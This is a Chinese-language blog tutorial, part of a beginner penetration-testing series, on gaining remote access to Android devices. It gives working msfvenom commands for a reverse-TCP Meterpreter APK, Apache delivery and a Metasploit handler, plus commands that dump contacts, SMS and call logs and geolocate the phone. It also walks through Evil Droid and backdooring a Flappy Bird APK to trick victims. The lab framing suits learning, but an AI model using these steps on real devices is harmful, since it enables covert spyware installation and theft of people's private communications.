iT邦幫忙

2024 iThome 鐵人賽

DAY 21
0
自我挑戰組

從零開始:資安滲透初探系列 第 21

17: 資安滲透初探: 番外:獲取安卓設備訪問權限

  • 分享至 

  • xImage
  •  

Android Hacking 理論

  1. 簡介
    • 今天要分享關於 Android 裝置的駭客攻擊技術。
    • 與 Windows 裝置相比,Android 裝置的攻擊難度較高,實際應用也不如 Windows 駭客攻擊實用。
  2. 主要概念
    • 攻擊準備
      • 使用 Kali Linux 製作惡意程式(Payload)。
      • 攻擊目標裝置並取得存取權。
      • 需要目標執行 Payload 才能生效,這一點比 Windows 攻擊更複雜。
    • 模擬裝置
      • 若沒有 Android 裝置,可以使用 Android 虛擬機來模擬手機。
      • 若有實體 Android 裝置,建議使用實體裝置進行測試,因為部分後期滲透操作在虛擬機上可能無法運行。
  3. 攻擊目標
    • 獲取目標裝置上的資訊
      • 提取聯絡人資訊。
      • 閱讀並發送短訊。
      • 檢查裝置是否已 Root。
      • 下載或上傳文件,包括圖片、應用程式等。
      • 嘗試打開攝像頭並進行錄像(虛擬機可能不支持)。
  4. 使用工具
    • Metasploit Framework
      • 使用 Msfvenom 為 Android 裝置生成 Payload。
      • 使用 Msfconsole 來捕捉並控制來自目標的連接。
      • 這些操作流程已經在前面章節中介紹過,本節將直接進行應用。
  5. 遠端攻擊
    • 非本地網路目標的攻擊
      • 涉及目標位於不同國家或不同網路環境的攻擊情況。
      • 這與先前的本地網路攻擊有所不同,但步驟並不複雜。
      • 該技術可應用於攻擊任何操作系統的裝置(Windows、Linux 或 Android)。

安裝 Android 虛擬機

  1. 下載 Android 作業系統
  2. 創建虛擬機
    • 與一般創建流程相同。
  3. 啟動 Android 虛擬機
    • 啟動虛擬機,第一次啟動可能需花費一些時間,請耐心等待。
    • 出現命令提示符和 Android 啟動畫面時,請勿進行任何操作。
  4. 操作 Android 虛擬機
    • 成功進入 Android 系統後,您可以進行各種操作,如瀏覽 Google Chrome、進入 Play Store 等。
    • Android 系統提供與實體裝置相似的操作體驗。
  5. 準備進行 Android 駭客攻擊
    • 確認 Android 虛擬機成功運行後,即可進行後續的駭客攻擊操作,例如使用 MSFvenom 創建專為 Android 設計的 Payload。

使用 Android Meterpreter 獲取存取權限

  1. 設定環境

    • 開啟 Kali Linux 和 Android 虛擬機。
    • 在 Kali Linux 中檢查 IP 位址,例: 192.168.1.9
  2. 生成 Android Payload

    • 使用 MSFVenom 創建 Android Meterpreter Payload:

      msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=5555 -o shell.apk
      
      

    • 在 Kali Linux 中啟動 Apache2 伺服器以傳送 payload:

      sudo service apache2 start
      
      

    • 將生成的 shell.apk 移動到 Apache 網站目錄:

      sudo mv shell.apk /var/www/html/
      
      
  3. 傳送並安裝 Payload

    • 在 Android 虛擬機上訪問 Kali Linux 伺服器並下載 shell.apk
      • 瀏覽器訪問 http://192.168.1.9/shell.apk
    • 目標必須下載並安裝應用程序,並可能會遇到安全提示,需點選允許安裝。
  4. 設置 MSF Console 並啟動 Meterpreter

    • 在 Kali Linux 中啟動 MSF Console:

      msfconsole
      
      
    • 使用多重處理程序來啟動 Meterpreter:

      use exploit/multi/handler
      set payload android/meterpreter/reverse_tcp
      set LHOST 192.168.1.9
      set LPORT 5555
      run
      
      



    • 當目標運行 shell.apk 後,Kali Linux 將會啟動 Meterpreter 會話。

  5. 使用 Meterpreter 進行後期利用

    • 常見命令:
      • getuid:顯示目標用戶身份。
      • dump_calllog:擷取通話紀錄。
      • dump_contacts:擷取聯絡人列表。
      • dump_sms:擷取 SMS 訊息。
      • send_sms:發送 SMS 訊息。
      • geolocate:獲取目標設備的經緯度。
  6. 管理 Android Payload

    • 在 Android 虛擬機上,惡意應用程序會顯示為“MainActivity”。
    • 可以長按並拖動到卸載區域,移除已安裝的惡意應用程序。

使用 Evil Droid 進行 Android 攻擊 - 條列式筆記

  1. 介紹

    • Evil Droid 是一款自動化工具,可幫助我們生成、設置並傳遞 Android 惡意 APK 檔案,簡化攻擊流程。
  2. 安裝與設置 Evil Droid

    • 在 Kali Linux 中開啟瀏覽器,搜尋 "Evil Droid" 並找到 GitHub 頁面。

    • 複製 GitHub 連結並使用 git clone 下載工具。

    • 進入下載的目錄,並確認工具檔案:

      cd Evil-Droid
      ls
      
      
    • evil-droid 設為可執行文件並以 sudo 啟動:

      chmod +x evil-droid
      sudo ./evil-droid
      
      

    • 程式將自動檢查並安裝所需的依賴,並啟動 Apache2 和 PostgreSQL 服務。

  3. 生成 Android APK Payload

    • 在主菜單中選擇生成 APK 檔案 (Create APK MSF)。
    • Evil Droid 將自動偵測本地 IP 地址,確認後選擇通訊埠 (例: 5555) 並命名 Payload (例: EvilAPK)。
    • 選擇 Payload 類型,推薦使用 android/meterpreter/reverse_tcp
    • 程式將自動生成 APK 檔案並準備 MSF Console 的 Multi-Handler。
  4. 傳送並安裝 Payload

    • 將生成的 APK 檔案移動到 Apache2 伺服器目錄:

      sudo mv EvilAPK.apk /var/www/html/
      
      
    • 在 Android 設備上透過瀏覽器訪問並下載 APK:

      • 例: 瀏覽器訪問 http://192.168.1.9/EvilAPK.apk
    • 安裝並開啟 APK,Meterpreter 會話將在 MSF Console 中啟動。

  5. 後期利用與命令測試

    • 使用 Meterpreter 執行常見命令,例如:
      • app_list:列出安裝的應用程式。
      • check_root:檢查設備是否已 Root。
      • dump_contacts:擷取聯絡人列表。
      • send_sms:發送 SMS 訊息。
    • 該工具自動完成了許多步驟,包括 Multi-Handler 設置,使得整個攻擊流程更加簡單。
  6. 小結

    • Evil Droid 是一款強大的工具,可以自動化生成並傳遞 Android 惡意應用程式,適合進行快速且有效的測試。

將惡意軟體植入 Flappy Bird 應用程式 - 條列式筆記

  1. 目標
    • 在 Flappy Bird 應用程式中植入一個惡意 payload,讓受害者在執行應用程式的同時,無意中執行了我們的後門。
  2. 準備
    • 下載 Flappy Bird APK 檔案:
      • 在瀏覽器中搜尋 "Flappy Bird APK"。
      • 選擇可下載 APK 檔案的網站,下載並儲存在本地目錄中。
    • 建立並注入 payload:
      • 使用 msfvenom 創建 payload 並將其注入到 Flappy Bird APK 中。
      • 使用 x 參數指定要注入的 APK 檔案。
  3. 檢查並安裝 Apktool
    • 若在注入 payload 過程中遇到問題,請先移除舊版 Apktool 並重新安裝:

      sudo apt-get remove apktool
      
      
    • 下載並安裝 Apktool:

      • 瀏覽 Apktool 官方網站,按照步驟安裝 Apktool 及其依賴。

      • 將安裝腳本和 jar 檔案移動到 /usr/local/bin/ 目錄下,並確保其具有執行權限:

        sudo chmod +x /usr/local/bin/apktool
        sudo chmod +x /usr/local/bin/apktool.jar
        
        
  4. 生成惡意 APK
    • 使用 msfvenom 將 payload 注入 Flappy Bird:

      sudo msfvenom -x Flappy_Bird.apk -p android/meterpreter/reverse_tcp LHOST=你的IP地址 LPORT=5555 -o test.apk
      
      
    • 成功生成後,將新生成的 test.apk 移動到 Web 伺服器目錄,並啟動 Apache 伺服器。

  5. 部署與運行
    • 在目標 Android 設備上通過瀏覽器下載並安裝 test.apk
    • 安裝過程中,應用程序將顯示為 Flappy Bird,並在安裝後自動啟動。
    • 受害者將運行 Flappy Bird 遊戲,並且在後台啟動了惡意 payload,與攻擊者的 Kali Linux 建立連接。
  6. 後期利用
    • 使用 Meterpreter 獲得的連接,可以執行與之前相同的命令,如 app_list, dump_contacts 等等。
  7. 測試
    • 可以在 Android 虛擬機上測試 Flappy Bird 的遊戲功能,同時確認攻擊 payload 的成功執行。

這個過程展示了如何將合法的 Android 應用程式與惡意 payload 結合,以欺騙目標用戶在不知不覺中執行惡意軟體。這種技術在社會工程攻擊中非常常見,特別是在目標不會仔細檢查應用程式來源或權限的情況下。


上一篇
16: 資安滲透初探: 番外: 無線接入點破解
下一篇
18: 資安滲透初探: 番外: 匿名性介紹
系列文
從零開始:資安滲透初探27
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言